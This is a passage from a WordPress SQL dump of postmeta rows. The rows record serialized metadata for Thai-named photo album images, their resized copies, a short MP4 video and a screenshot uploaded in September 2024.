;i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:231157;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_10-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21027;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3070,1148,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_9.jpg'),
(3071,1148,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:54:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_9.jpg\";s:8:\"filesize\";i:916668;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_9-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18252;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_9-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:132097;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_9-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7043;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_9-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:82144;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_9-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:261987;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_9-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:433667;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_9-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17697;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3072,1149,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_7.jpg'),
(3073,1149,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:54:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_7.jpg\";s:8:\"filesize\";i:1036062;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_7-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19011;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_7-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:143506;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_7-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7628;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_7-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88346;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_7-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:285490;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_7-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:473611;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_7-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20740;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3074,1150,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_6.jpg'),
(3075,1150,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:54:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_6.jpg\";s:8:\"filesize\";i:1034966;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_6-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18916;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_6-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141932;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7585;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_6-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87838;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_6-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:284697;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_6-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:472160;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_6-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20575;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3076,1151,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_8.jpg'),
(3077,1151,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:54:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_8.jpg\";s:8:\"filesize\";i:1092051;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_8-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18460;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_8-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:144290;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_8-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7371;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_8-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:88186;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_8-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:292110;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_8-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:493909;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_8-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20778;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3078,1152,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_5.jpg'),
(3079,1153,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_4.jpg'),
(3080,1152,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:54:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_5.jpg\";s:8:\"filesize\";i:354964;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_5-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:14856;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_5-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:104259;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_5-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6938;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_5-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:65758;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_5-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:199428;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_5-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18500;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3081,1153,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:54:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_4.jpg\";s:8:\"filesize\";i:394460;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_4-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16987;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_4-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:118815;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_4-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8597;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_4-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:74928;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_4-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:222963;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_4-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:21372;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3082,1154,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_3.jpg'),
(3083,1154,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:54:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_3.jpg\";s:8:\"filesize\";i:259539;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_3-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:13018;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_3-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:81810;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6774;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_3-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:52883;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_3-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:150880;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_3-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:16353;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3084,1155,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_2.jpg'),
(3085,1155,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:54:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_2.jpg\";s:8:\"filesize\";i:928203;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_2-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18934;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_2-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:147660;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7708;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_2-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:91008;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_2-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:289223;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_2-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:461090;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_2-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20537;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3086,1156,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_1.jpg'),
(3087,1156,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1477;s:6:\"height\";i:1108;s:4:\"file\";s:54:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_1.jpg\";s:8:\"filesize\";i:335056;s:5:\"sizes\";a:5:{s:6:\"medium\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18260;}s:5:\"large\";a:5:{s:4:\"file\";s:55:\"LINE_ALBUM_PAปีงบ25662567_240911_1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:127045;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7480;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:80324;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:54:\"LINE_ALBUM_PAปีงบ25662567_240911_1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:19246;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3088,1157,'_wp_attached_file','2024/09/LINE_ALBUM_PAปีงบ25662567_240911_6-1.jpg'),
(3089,1157,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:2364;s:6:\"height\";i:1774;s:4:\"file\";s:56:\"2024/09/LINE_ALBUM_PAปีงบ25662567_240911_6-1.jpg\";s:8:\"filesize\";i:1034966;s:5:\"sizes\";a:7:{s:6:\"medium\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_6-1-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18916;}s:5:\"large\";a:5:{s:4:\"file\";s:57:\"LINE_ALBUM_PAปีงบ25662567_240911_6-1-1024x768.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:141932;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_6-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:7585;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_6-1-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:87838;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:58:\"LINE_ALBUM_PAปีงบ25662567_240911_6-1-1536x1153.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1153;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:284697;}s:9:\"2048x2048\";a:5:{s:4:\"file\";s:58:\"LINE_ALBUM_PAปีงบ25662567_240911_6-1-2048x1537.jpg\";s:5:\"width\";i:2048;s:6:\"height\";i:1537;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:472160;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:56:\"LINE_ALBUM_PAปีงบ25662567_240911_6-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:20575;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(3091,1139,'_thumbnail_id','1154'),
(3092,1139,'_edit_last','1'),
(3093,1139,'title_style','default'),
(3094,1139,'_title_style','field_5d1a0217cf408'),
(3095,1139,'related',''),
(3096,1139,'_related','field_603b51c3e183e'),
(3097,1158,'title_style','default'),
(3098,1158,'_title_style','field_5d1a0217cf408'),
(3099,1158,'related',''),
(3100,1158,'_related','field_603b51c3e183e'),
(3101,1159,'_edit_lock','1726152264:1'),
(3102,1160,'_wp_attached_file','2024/09/สุขาดีมีความสุข.mp4'),
(3103,1160,'_wp_attachment_metadata','a:10:{s:8:\"filesize\";i:8844314;s:9:\"mime_type\";s:9:\"video/mp4\";s:6:\"length\";i:121;s:16:\"length_formatted\";s:4:\"2:01\";s:5:\"width\";i:640;s:6:\"height\";i:360;s:10:\"fileformat\";s:3:\"mp4\";s:10:\"dataformat\";s:9:\"quicktime\";s:5:\"audio\";a:7:{s:10:\"dataformat\";s:3:\"mp4\";s:5:\"codec\";s:19:\"ISO/IEC 14496-3 AAC\";s:11:\"sample_rate\";d:44100;s:8:\"channels\";i:2;s:15:\"bits_per_sample\";i:16;s:8:\"lossless\";b:0;s:11:\"channelmode\";s:6:\"stereo\";}s:17:\"created_timestamp\";i:1726123697;}'),
(3104,1161,'_wp_attached_file','2024/09/Screenshot-2024-09-12-213449.png'),
(3105,1161,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:840;s:6:\"height\";i:468;s:4:\"file\";s:40:\"2024/09/Screenshot-2024-09-12-213449.png\";s:8:\"filesize\";i:484699;s:5:\"sizes\";a:4:{s:6:\"medium\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-09-12-213449-300x167.png\";s:5:\"width\";i:300;s:6:\"height\";i:167;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:75825;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-09-12-213449-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:32146;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:40:\"Screenshot-2024-09-12-213449-768x428.png\";s:5:\"width\";i:768;s:6:\"height\";i:428;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:355534;}s:14: